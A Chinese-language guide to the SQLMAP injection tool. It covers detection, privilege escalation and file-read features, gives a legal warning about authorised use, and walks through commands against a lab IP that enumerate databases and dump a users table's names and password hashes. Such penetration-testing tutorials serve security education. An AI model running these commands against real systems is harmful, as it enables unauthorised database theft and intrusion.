SQLMAP 全面指南

一、SQLMAP 核心定位

SQLMAP 是一款基于 Python 开发的 开源自动化 SQL 注入渗透测试工具，堪称 Web 安全领域针对 SQL 注入的「标杆工具」，核心目标聚焦两点：

1. 自动化检测 Web 应用中各类 SQL 注入漏洞（覆盖报错注入、布尔盲注、时间盲注、联合查询注入、堆叠查询注入等主流类型）；
2. 深度利用已发现漏洞，实现从「数据库访问」到「系统级控制」的全流程渗透，满足不同场景下的安全测试需求。

二、核心特性与功能模块

1. 强大的检测引擎

• 多位置自动识别：支持探测 GET/POST 参数、Cookie、HTTP 头部（如 Referer、User-Agent）、HTTP -body 等多个位置的注入漏洞；
• 复杂场景适配：兼容 URL 编码、Base64 编码等多种编码格式，支持自定义 HTTP 请求头、代理转发（HTTP/SOCKS）、延迟注入（应对高防护场景）等复杂环境；
• 智能注入选型：自动识别注入类型（报错/布尔/时间/堆叠等），根据目标系统响应动态选择最优利用方式，提升检测成功率。

2. 数据库层渗透能力

• 精准指纹识别：快速判断目标数据库类型（MySQL、PostgreSQL、SQL Server、Oracle 等）及具体版本，适配不同数据库的特性；
• 全维度数据获取：批量导出表结构、字段内容、存储过程、用户权限等信息，支持按条件筛选导出（减少资源占用，避免数据库宕机）；
• 权限深度操控：检测当前数据库用户权限（是否为 DBA），尝试提权、创建管理员账号、开启远程访问等高危操作。

3. 系统级访问与命令执行

• DBMS 底层操作：读取数据库配置文件、修改运行参数、操作审计日志等；
• 操作系统穿透：
  • 直接命令执行：当数据库用户权限足够时（如 MySQL 的 FILE 权限、SQL Server 的 xp_cmdshell 组件启用），可执行 whoami、dir 等系统命令；
  • 带外数据传输：针对无回显盲注场景，通过 DNSlog、SMB 共享、HTTP 请求等 Out-of-Band 方式接收执行结果，解决盲注利用难题；
• 文件双向操作：上传本地文件（如后门程序）到目标系统，或下载敏感文件（如 Linux 的 /etc/passwd、Windows 的 system32/config/SAM）。

三、支持范围与适用场景

1. 兼容主流数据库

• 完全支持：MySQL、PostgreSQL、SQL Server、Oracle、SQLite、Access、DB2 等；
• 针对性优化：适配不同数据库的特有功能（如 Oracle 的 UTL_HTTP 包利用、SQL Server 的 OLE Automation Procedures 提权、MySQL 的 into outfile 写文件等）。

2. 典型合法使用场景

• 渗透测试工程师对 授权目标 进行安全评估，验证 SQL 注入漏洞的实际危害；
• 安全研究员复现漏洞，测试 WAF、IPS 等防护设备的检测与拦截能力；
• 企业内部安全审计，排查自有 Web 应用的 SQL 注入风险（需在合规框架内执行）。

四、重要合规性提示

SQLMAP 的强大功能伴随 极高法律与操作风险，使用时必须严格遵守以下原则：

1. 仅可用于 自身拥有所有权或已获得书面明确授权 的目标系统，严禁用于未授权第三方系统（违反《网络安全法》《刑法》等法律法规，需承担刑事责任）；
2. 测试过程中必须保留完整操作日志，避免高频请求、全量数据导出等操作导致目标系统服务中断；
3. 禁止利用工具窃取用户隐私、商业机密等敏感数据，否则将面临民事赔偿及刑事处罚。

五、SQLMAP 核心参数

1. 目标指定参数（基础）

2. 漏洞利用与数据获取参数

3. 探测配置参数

4. 文件操作参数

六、实际操作案例（完整流程）

以目标 URL http://192.168.87.243/?nid=1 为例，演示从漏洞检测到数据导出的全流程：

步骤 1：判断是否存在 SQL 注入漏洞

1

sqlmap -u "http://192.168.87.243/?nid=1"

• 作用：自动探测目标参数 nid 是否存在注入漏洞，输出注入类型、数据库类型等基础信息。
• 效果示意图：
  

步骤 2：枚举所有数据库

1

sqlmap -u "http://192.168.87.243/?nid=1" --dbs

• 作用：获取目标数据库服务器中所有可用数据库名称。
• 效果示意图：
  

步骤 3：确认当前使用的数据库

1

sqlmap -u "http://192.168.87.243/?nid=1" --level=5 --risk=3 --current-db

• 参数说明：--level=5（最高检测等级）、--risk=3（最高风险等级），精准获取当前数据库。
• 效果示意图：
  

步骤 4：枚举目标数据库中的表

1

sqlmap -u "http://192.168.87.243/?nid=1" --level=5 --risk=3 -D "d7db" --tables

• 参数说明：-D "d7db" 指定目标数据库为 d7db，--tables 枚举该数据库下所有表。
• 效果示意图：
  

步骤 5：枚举目标表中的字段

1

sqlmap -u "http://192.168.87.243/?nid=1" --level=5 --risk=3 -D "d7db" -T "users" --columns

• 参数说明：-T "users" 指定目标表为 users，--columns 枚举该表下所有字段。
• 效果示意图：
  

步骤 6：导出目标字段的数据

1

sqlmap -u "http://192.168.87.243/?nid=1" --level=5 --risk=3 -D "d7db" -T "users" -C "name,pass,uid" --dump

• 参数说明：-C "name,pass,uid" 指定需导出的字段，--dump 导出字段对应的具体数据。
• 效果示意图：
  

步骤 7：查询数据库当前用户

1

sqlmap -u "http://192.168.87.243/?nid=1" --current-user

• 作用：获取当前连接数据库的用户账号。
• 效果示意图：
  

步骤 8：检测当前用户是否为 DBA

1

sqlmap -u "http://192.168.87.243/?nid=1" --is-dba

• 作用：判断当前数据库用户是否拥有管理员权限（DBA），为后续提权操作提供依据。
• 效果示意图：